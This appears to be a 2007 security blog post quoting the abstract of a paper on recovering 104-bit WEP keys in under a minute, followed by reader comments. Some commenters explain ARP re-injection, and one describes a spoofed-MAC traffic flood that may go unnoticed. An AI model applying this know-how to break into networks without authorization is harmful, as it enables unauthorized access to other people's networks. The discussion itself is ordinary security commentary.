Breaking WEP in Under a Minute

WEP (Wired Equivalent Privacy) was the protocol used to secure wireless networks. It’s known to be insecure and has been replaced by Wi-Fi Protected Access, but it’s still in use.

This paper, “Breaking 104 bit WEP in less than 60 seconds,” is the best attack against WEP to date:

Abstract:

We demonstrate an active attack on the WEP protocol that is able to recover a 104-bit WEP key using less than 40.000 frames with a success probability of 50%. In order to succeed in 95% of all cases, 85.000 packets are needed. The IV of these packets can be randomly chosen. This is an improvement in the number of required frames by more than an order of magnitude over the best known key-recovery attacks for WEP. On a IEEE 802.11g network, the number of frames required can be obtained by re-injection in less than a minute. The required computational effort is approximately 2^20 RC4 key setups, which on current desktop and laptop CPUs in negligible.

Tags: , , , , ,

Posted on April 4, 2007 at 12:46 PM28 Comments

Comments

MyCat April 4, 2007 1:05 PM

“The required computational effort is approximately 220 RC4 key setups”

That’s 2 to the 20th power in the paper. While a million is still a very small number of key setups, it’s still a lot more than 220.

David April 4, 2007 1:13 PM

I have problems with them saying that it would take a minute. The specific issue I have is gathering the 85,000 packets (to assure a crack at 90+%).

Unless you are forcing replies from the source, you can’t sniff 80,000 packets in a minute. Heck, I can’t get 85,000 packets from a 100 mbps connection without forcing replies.

We’ve seen wireless connections that are active all day (being used) with less than 80,000 packets.

The cracking of the key can probably be done in less than a minute, but getting the data can’t be done that easily.

Josquin April 4, 2007 1:19 PM

“On a IEEE 802.11g network, the number of frames required can be obtained by re-injection in less than a minute.”

There is how you get the appropriate number of frames.

Aaron April 4, 2007 1:28 PM

“On a IEEE 802.11g network, the number of frames required can be obtained by re-injection in less than a minute.”

This captures an ARP request packet and repeatedly re-sends it, generating up to 3 new packets to capture. On my system ARP requests are 42 bytes and replies are 60 bytes so you could generate 85000 packets with 8.7MB of data xferred if you get one arp reply packet per arp sent. That’ll be more than one second on 802.11g but less than two seconds probably.

Anonymous April 4, 2007 2:34 PM

Is there any practical software available using this method yet? Is there any planned?

Dan April 4, 2007 3:07 PM

@David:
Its way too easy with the right tools and right wireless card. I don’t think I should necessarily mention them here, but they aren’t hard to find.

FooDoo April 4, 2007 4:09 PM

There was a talk at Shmoocon ’07 re: cracking WEP using sniffed packets and FPGAs (specialized circuit boards).

Anonymous Pilot April 4, 2007 4:52 PM

Remember what Bruce said, be careful in designing a cryptographic system, it will be with use for a long fscking time.

The Anonymous Pilot

David April 4, 2007 5:30 PM

I’m very familiar with forcing traffic and creating traffic, there are a ton of tools to do this.

What I was referring to was “passively” sniffing 85,000 frames.

Any time you inject packets something of yours is detectable, possibly the OS, the tool, etc.

If you want to crack it without letting anyone know, you need to do this “passively”, and 85,000 packets is a long time when you are doing that.

You guys are like the bank robbers that are blowing up ATMs. Sure you get the money, but you leave a ton of evidence behind….. Not so good, IMHO.

Woody April 4, 2007 6:12 PM

@David

If the goal is to crack a home network from the curb, who’s going to be monitoring the wireless network for a flood of ARPs?

Even with a corporate network, is an attack of this sort likely to be noticed? Running a spoofed mac id and pounding the network for say 5-10 seconds (to spread it out a bit), is anyone going to notice that host A seemed excessively curious about host B (at the ARP level, not at the IP firewall level?)

Thomas April 4, 2007 8:24 PM

@David,
“””Any time you inject packets something of yours is detectable, possibly the OS, the tool, etc.”””

I doubt that anyone still using WEP is going to be collecting, much less looking at, this sort of stuff.

jose April 4, 2007 9:58 PM

Well that is and old news but it come vorse to the people just change the system and go up to internet

Samy April 4, 2007 10:41 PM

Well, just for the record … I live in Mexico, and it is VERY HARD to find a WPA secured network here … It is either open, or WEP :-o. Call it paradise 😉

A.Person from the UK April 5, 2007 3:18 AM

in the paper they mention that looking at sites around Germany they found many still using WEP. In the UK there are many home networks with no encryption and many that use WEP as its the next choice on the list after none.

Warez April 5, 2007 4:10 AM

@Anonymous,

Good, when the music police come knocking down my door I’ll say it was you 😉

Rick April 5, 2007 10:07 AM

@Warez

but he lied, he did not “do my best to secure this”, he deliberately removed all security. I agree it is a useful letter but, as we now know that any wireless security is at best a delay, he may as well leave it switched on and not lie.

Greg April 5, 2007 11:38 AM

@Rick
The intended letter reads “I will do my best to secure this”, meaning that he will try and sort the problem out after he was informed of the infringement not that it was already secured.

K. Signal Eingang April 5, 2007 2:44 PM

I use WEP at home and will probably continue to for some time, for several reasons:

First, WEP is enough to keep the casual bandwidth poachers away, and my apartment building alone has at least two completely unsecured networks running, so I doubt anyone’s going to make much of an effort to crack mine.

Second, I’ve got other controls – my wireless network is isolated from my desktop PCs by a firewall, so even if somebody finds my SSID, cracks my WEP key and hops on the network, they’re not going to do anything more serious than leech a few kbps of bandwidth.

Finally and most importantly, the Nintendo DS doesn’t support WPA. And I gots to have my Mario Kart!

Anony. Europe April 6, 2007 12:50 AM

A short but interesting note to those people who take the “better not secure WLAN at all” stand:
in some European countries court decisions have pointed out, that the person owning the access point is responsible for proper security. Neglecting this can result in liability for misuse of the access point, including illegal downloads tracked down by IP, hacking etc.
–> very bad idea not to secure wireless LAN properly, at least in Europe, you might as well shoot your own leg
Happy Easter

Abruzzi September 18, 2007 6:21 PM

just simply, i do not see nothing new in that pdf :(, only collected information and putted together…

Leave a comment

Login

Allowed HTML <a href="URL"> • <em> <cite> <i> • <strong> <b> • <sub> <sup> • <ul> <ol> <li> • <blockquote> <pre> Markdown Extra syntax via https://michelf.ca/projects/php-markdown/extra/

Sidebar photo of Bruce Schneier by Joe MacInnis.